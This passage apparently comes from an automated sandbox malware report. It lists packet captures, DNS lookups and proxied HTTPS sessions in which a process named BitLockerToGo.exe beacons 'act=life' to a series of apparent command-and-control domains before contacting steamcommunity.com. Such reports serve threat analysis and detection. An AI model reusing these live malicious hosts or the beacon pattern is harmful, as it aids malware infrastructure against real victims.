                                                                                                                Oct 13, 2024 12:00:33.487698078 CEST44349742104.21.79.35192.168.2.4
                                                                                                                Oct 13, 2024 12:00:33.944500923 CEST44349742104.21.79.35192.168.2.4
                                                                                                                Oct 13, 2024 12:00:33.944735050 CEST44349742104.21.79.35192.168.2.4
                                                                                                                Oct 13, 2024 12:00:33.944792986 CEST49742443192.168.2.4104.21.79.35
                                                                                                                Oct 13, 2024 12:00:33.945214033 CEST49742443192.168.2.4104.21.79.35
                                                                                                                Oct 13, 2024 12:00:33.945235014 CEST44349742104.21.79.35192.168.2.4
                                                                                                                Oct 13, 2024 12:00:33.945246935 CEST49742443192.168.2.4104.21.79.35
                                                                                                                Oct 13, 2024 12:00:33.945251942 CEST44349742104.21.79.35192.168.2.4
                                                                                                                Oct 13, 2024 12:00:33.965183020 CEST49743443192.168.2.4188.114.97.3
                                                                                                                Oct 13, 2024 12:00:33.965270042 CEST44349743188.114.97.3192.168.2.4
                                                                                                                Oct 13, 2024 12:00:33.965373993 CEST49743443192.168.2.4188.114.97.3
                                                                                                                Oct 13, 2024 12:00:33.965883017 CEST49743443192.168.2.4188.114.97.3
                                                                                                                Oct 13, 2024 12:00:33.965959072 CEST44349743188.114.97.3192.168.2.4
                                                                                                                Oct 13, 2024 12:00:34.145781994 CEST49743443192.168.2.4188.114.97.3
                                                                                                                Oct 13, 2024 12:00:34.155818939 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:34.155838013 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:34.155905962 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:34.156519890 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:34.156533957 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:34.873780966 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:34.873903036 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:34.875864029 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:34.875869989 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:34.876358032 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:34.878119946 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:34.919447899 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.413125992 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.413189888 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.413202047 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:35.413217068 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.413233042 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.413253069 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:35.413294077 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:35.413299084 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.457998037 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:35.561690092 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.561753988 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.561772108 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:35.561783075 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.561810970 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:35.561825037 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:35.561907053 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.561964035 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:35.562021017 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.562067032 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:35.562069893 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.562174082 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.562223911 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:35.562253952 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:35.562263966 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.562273979 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:35.562278032 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.631335020 CEST49745443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:35.631380081 CEST44349745172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.631464005 CEST49745443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:35.631848097 CEST49745443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:35.631859064 CEST44349745172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.132714987 CEST44349745172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.133164883 CEST49745443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.135338068 CEST49745443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.135420084 CEST44349745172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.135967970 CEST44349745172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.137757063 CEST49745443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.137757063 CEST49745443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.138025999 CEST44349745172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.251207113 CEST44349745172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.251324892 CEST44349745172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.251432896 CEST44349745172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.251511097 CEST44349745172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.251554012 CEST49745443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.251624107 CEST44349745172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.251662016 CEST49745443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.251759052 CEST44349745172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.251959085 CEST49745443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.251959085 CEST49745443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.251959085 CEST49745443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.314137936 CEST49746443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.314222097 CEST44349746172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.314316988 CEST49746443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.314677000 CEST49746443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.314737082 CEST44349746172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.551794052 CEST49745443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.551856041 CEST44349745172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.817224026 CEST44349746172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.817467928 CEST49746443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.818979025 CEST49746443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.819032907 CEST44349746172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.819554090 CEST44349746172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.821067095 CEST49746443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.821067095 CEST49746443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.821330070 CEST44349746172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:37.287498951 CEST44349746172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:37.287729979 CEST44349746172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:37.288094044 CEST49746443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:37.288176060 CEST49746443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:37.288177013 CEST49746443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:37.288218975 CEST44349746172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:37.288250923 CEST44349746172.67.206.204192.168.2.4

                                                                                                                UDP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Oct 13, 2024 12:00:26.160203934 CEST5881253192.168.2.41.1.1.1
                                                                                                                Oct 13, 2024 12:00:26.773473024 CEST53588121.1.1.1192.168.2.4
                                                                                                                Oct 13, 2024 12:00:28.058427095 CEST5521553192.168.2.41.1.1.1
                                                                                                                Oct 13, 2024 12:00:28.072606087 CEST53552151.1.1.1192.168.2.4
                                                                                                                Oct 13, 2024 12:00:29.017334938 CEST5806453192.168.2.41.1.1.1
                                                                                                                Oct 13, 2024 12:00:29.026679993 CEST53580641.1.1.1192.168.2.4
                                                                                                                Oct 13, 2024 12:00:29.044146061 CEST5816453192.168.2.41.1.1.1
                                                                                                                Oct 13, 2024 12:00:29.064110041 CEST53581641.1.1.1192.168.2.4
                                                                                                                Oct 13, 2024 12:00:30.077573061 CEST4950153192.168.2.41.1.1.1
                                                                                                                Oct 13, 2024 12:00:30.092391968 CEST53495011.1.1.1192.168.2.4
                                                                                                                Oct 13, 2024 12:00:30.993989944 CEST5884553192.168.2.41.1.1.1
                                                                                                                Oct 13, 2024 12:00:31.009248972 CEST53588451.1.1.1192.168.2.4
                                                                                                                Oct 13, 2024 12:00:31.976752996 CEST4970953192.168.2.41.1.1.1
                                                                                                                Oct 13, 2024 12:00:31.996896029 CEST53497091.1.1.1192.168.2.4
                                                                                                                Oct 13, 2024 12:00:32.981280088 CEST5795653192.168.2.41.1.1.1
                                                                                                                Oct 13, 2024 12:00:32.994288921 CEST53579561.1.1.1192.168.2.4
                                                                                                                Oct 13, 2024 12:00:33.952215910 CEST5118953192.168.2.41.1.1.1
                                                                                                                Oct 13, 2024 12:00:33.964303017 CEST53511891.1.1.1192.168.2.4
                                                                                                                Oct 13, 2024 12:00:34.147895098 CEST6501253192.168.2.41.1.1.1
                                                                                                                Oct 13, 2024 12:00:34.154998064 CEST53650121.1.1.1192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.574074984 CEST5701653192.168.2.41.1.1.1
                                                                                                                Oct 13, 2024 12:00:35.629550934 CEST53570161.1.1.1192.168.2.4

                                                                                                                DNS Queries

                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Oct 13, 2024 12:00:26.160203934 CEST192.168.2.41.1.1.10xfc5cStandard query (0)proclaimykn.buzzA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:28.058427095 CEST192.168.2.41.1.1.10x5b6cStandard query (0)mathcucom.sbsA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:29.017334938 CEST192.168.2.41.1.1.10x2ba8Standard query (0)allocatinow.sbsA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:29.044146061 CEST192.168.2.41.1.1.10xec7eStandard query (0)enlargkiw.sbsA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:30.077573061 CEST192.168.2.41.1.1.10x43bfStandard query (0)resinedyw.sbsA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:30.993989944 CEST192.168.2.41.1.1.10xee47Standard query (0)vennurviot.sbsA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:31.976752996 CEST192.168.2.41.1.1.10xd70fStandard query (0)ehticsprocw.sbsA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:32.981280088 CEST192.168.2.41.1.1.10xe04Standard query (0)condifendteu.sbsA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:33.952215910 CEST192.168.2.41.1.1.10xbd43Standard query (0)drawwyobstacw.sbsA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:34.147895098 CEST192.168.2.41.1.1.10xb1c9Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:35.574074984 CEST192.168.2.41.1.1.10xc89bStandard query (0)sergei-esenin.comA (IP address)IN (0x0001)false

                                                                                                                DNS Answers

                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Oct 13, 2024 12:00:26.773473024 CEST1.1.1.1192.168.2.40xfc5cNo error (0)proclaimykn.buzz188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:26.773473024 CEST1.1.1.1192.168.2.40xfc5cNo error (0)proclaimykn.buzz188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:28.072606087 CEST1.1.1.1192.168.2.40x5b6cNo error (0)mathcucom.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:28.072606087 CEST1.1.1.1192.168.2.40x5b6cNo error (0)mathcucom.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:29.026679993 CEST1.1.1.1192.168.2.40x2ba8Name error (3)allocatinow.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:29.064110041 CEST1.1.1.1192.168.2.40xec7eNo error (0)enlargkiw.sbs104.21.33.249A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:29.064110041 CEST1.1.1.1192.168.2.40xec7eNo error (0)enlargkiw.sbs172.67.152.13A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:30.092391968 CEST1.1.1.1192.168.2.40x43bfNo error (0)resinedyw.sbs104.21.77.78A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:30.092391968 CEST1.1.1.1192.168.2.40x43bfNo error (0)resinedyw.sbs172.67.205.156A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:31.009248972 CEST1.1.1.1192.168.2.40xee47No error (0)vennurviot.sbs172.67.140.193A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:31.009248972 CEST1.1.1.1192.168.2.40xee47No error (0)vennurviot.sbs104.21.46.170A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:31.996896029 CEST1.1.1.1192.168.2.40xd70fNo error (0)ehticsprocw.sbs172.67.173.224A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:31.996896029 CEST1.1.1.1192.168.2.40xd70fNo error (0)ehticsprocw.sbs104.21.30.221A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:32.994288921 CEST1.1.1.1192.168.2.40xe04No error (0)condifendteu.sbs104.21.79.35A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:32.994288921 CEST1.1.1.1192.168.2.40xe04No error (0)condifendteu.sbs172.67.141.136A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:33.964303017 CEST1.1.1.1192.168.2.40xbd43No error (0)drawwyobstacw.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:33.964303017 CEST1.1.1.1192.168.2.40xbd43No error (0)drawwyobstacw.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:34.154998064 CEST1.1.1.1192.168.2.40xb1c9No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:35.629550934 CEST1.1.1.1192.168.2.40xc89bNo error (0)sergei-esenin.com172.67.206.204A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:35.629550934 CEST1.1.1.1192.168.2.40xc89bNo error (0)sergei-esenin.com104.21.53.8A (IP address)IN (0x0001)false

                                                                                                                HTTP Request Dependency Graph

                                                                                                                • proclaimykn.buzz
                                                                                                                • mathcucom.sbs
                                                                                                                • enlargkiw.sbs
                                                                                                                • resinedyw.sbs
                                                                                                                • vennurviot.sbs
                                                                                                                • ehticsprocw.sbs
                                                                                                                • condifendteu.sbs
                                                                                                                • steamcommunity.com
                                                                                                                • sergei-esenin.com

                                                                                                                HTTPS Proxied Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.449736188.114.97.34434564C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-13 10:00:27 UTC263OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: proclaimykn.buzz
                                                                                                                2024-10-13 10:00:27 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                Data Ascii: act=life
                                                                                                                2024-10-13 10:00:28 UTC819INHTTP/1.1 200 OK
                                                                                                                Date: Sun, 13 Oct 2024 10:00:27 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=6eh785990vvtnmum9fdesma51d; expires=Thu, 06 Feb 2025 03:47:06 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CLvQInTNF17sHTFrI15hpIm5bAI1BlZlEgPQOUtCnQeRnvWv2UM5b99k80LLJ%2F0QbDL1tm6gbZZ5Qjad74u1YZIukT6JqUfA1m%2F0Fs683%2FnZqsuXUxitkZUDO85bKDfMlcgl"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8d1e7b94ea0e1869-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                2024-10-13 10:00:28 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                Data Ascii: aerror #D12
                                                                                                                2024-10-13 10:00:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.449737188.114.96.34434564C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-13 10:00:28 UTC260OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: mathcucom.sbs
                                                                                                                2024-10-13 10:00:28 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                Data Ascii: act=life
                                                                                                                2024-10-13 10:00:29 UTC815INHTTP/1.1 200 OK
                                                                                                                Date: Sun, 13 Oct 2024 10:00:28 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=quhu9p75n7ft3059j9nnducup2; expires=Thu, 06 Feb 2025 03:47:07 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L2hPsZgi%2FJTBdM3FYp6bIaBnxYRCzSpx6CDwFAmehK2IkR7wm2y2d%2FlhvG7WyV8kNIN0FE0C3XCj4lGIJJa0hRFvyWysdRfGqx6XOTaNpBzkOiiAJhg%2FJphy0eKYnryQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8d1e7b9b29041831-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                2024-10-13 10:00:29 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                Data Ascii: aerror #D12
                                                                                                                2024-10-13 10:00:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.449738104.21.33.2494434564C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-13 10:00:29 UTC260OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: enlargkiw.sbs
                                                                                                                2024-10-13 10:00:29 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                Data Ascii: act=life
                                                                                                                2024-10-13 10:00:30 UTC819INHTTP/1.1 200 OK
                                                                                                                Date: Sun, 13 Oct 2024 10:00:29 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=hcrdtdhf1m22eppe15ma2jh697; expires=Thu, 06 Feb 2025 03:47:08 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AJ05BJHwuKfmNnjLDnWtUQWoRJ%2F4Ba%2FBDomfhbWkTYI3NDsQ0xEuP1kcI%2F1TfEU3bF1TURLvJRl0WheQykQxixrOOsseoLrpFsx%2B59Re5DCMvGM%2FZrmugx3Eb78X6e55"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8d1e7ba1398d4316-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                2024-10-13 10:00:30 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                Data Ascii: aerror #D12
                                                                                                                2024-10-13 10:00:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.449739104.21.77.784434564C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-13 10:00:30 UTC260OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: resinedyw.sbs
                                                                                                                2024-10-13 10:00:30 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                Data Ascii: act=life
                                                                                                                2024-10-13 10:00:30 UTC819INHTTP/1.1 200 OK
                                                                                                                Date: Sun, 13 Oct 2024 10:00:30 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=iaaelrhuqkfj8tf7u0c9fcoke3; expires=Thu, 06 Feb 2025 03:47:09 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bv8%2Fqoy%2F7HvRd9kyzcFcNWrJtWAekylzc%2FY83V02y2lnyy3wlGq785qpUhxLlPmxtC9JtGxor0LOhG7pxOD16%2FBHPyIuLqyA79b929bAxX4OMDgY3%2BdVPCta2lD4hCM3"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8d1e7ba78bcd18f6-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                2024-10-13 10:00:30 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                Data Ascii: aerror #D12
                                                                                                                2024-10-13 10:00:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.449740172.67.140.1934434564C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-13 10:00:31 UTC261OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: vennurviot.sbs
                                                                                                                2024-10-13 10:00:31 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                Data Ascii: act=life
                                                                                                                2024-10-13 10:00:31 UTC821INHTTP/1.1 200 OK
                                                                                                                Date: Sun, 13 Oct 2024 10:00:31 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=p9ubmr8j13m5pk9c9jndtn5pdb; expires=Thu, 06 Feb 2025 03:47:10 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jW3%2B6GFeLMkUF2dmvwzOX99IFGIXJUCvCCq9Bsniy4SsNij5bkH8GgWqhcYJ%2BmnW0paqrRdzIorRUXYDrBFNekc0oSnyMFkN2WQshhzFcrKqVxtN8F4GC5uUpCLSgSI2JQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8d1e7bad68c08c45-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                2024-10-13 10:00:31 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                Data Ascii: aerror #D12
                                                                                                                2024-10-13 10:00:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.449741172.67.173.2244434564C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-13 10:00:32 UTC262OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
